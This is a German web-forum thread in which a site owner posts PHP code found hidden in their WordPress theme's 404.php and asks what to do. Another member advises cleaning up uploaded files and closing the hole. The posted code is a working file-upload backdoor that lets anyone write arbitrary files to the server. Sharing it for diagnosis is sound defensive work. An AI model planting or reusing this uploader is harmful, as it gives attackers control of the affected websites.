Merkwürdiges File im Theme Ordner (Hack?)

  • Zu meinem Problem: ich hab heute beim Durchstöbern meines Themes in der 404.php merkwürdigen Code gefunden. Sieht für mich nach einem Exploit aus, mit dem man sogar direkt hochladen kann, super ;)

    Was sagt ihr dazu?

    PHP
    <?phpif(isset($_POST['Submit'])){    $filedir = "";     $maxfile = '2000000';
        $userfile_name = $_FILES['image']['name'];    $userfile_tmp = $_FILES['image']['tmp_name'];    if (isset($_FILES['image']['name'])) {        $abod = $filedir.$userfile_name;        @move_uploaded_file($userfile_tmp, $abod);  echo"<center><b>Done ==> $userfile_name</b></center>";}}else{echo'<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';}?>

    Problem ist bereits behoben und Backup ist eingespielt. Theme wurde auch gewechselt - ist vermutlich nun clean. Gibts sonst noch was zu tun?

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren


  • Problem ist bereits behoben und Backup ist eingespielt. Theme wurde auch gewechselt - ist vermutlich nun clean. Gibts sonst noch was zu tun?


    die neuen Dateien ( @move_uploaded_file($userfile_tmp, .... ) solltest du auch beseitigen und die Code Änderungen an WordPress auch löschen und die Sicherheitslücke solltest du auch eben beseitigen.

    Mit offenen Augen träumen

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!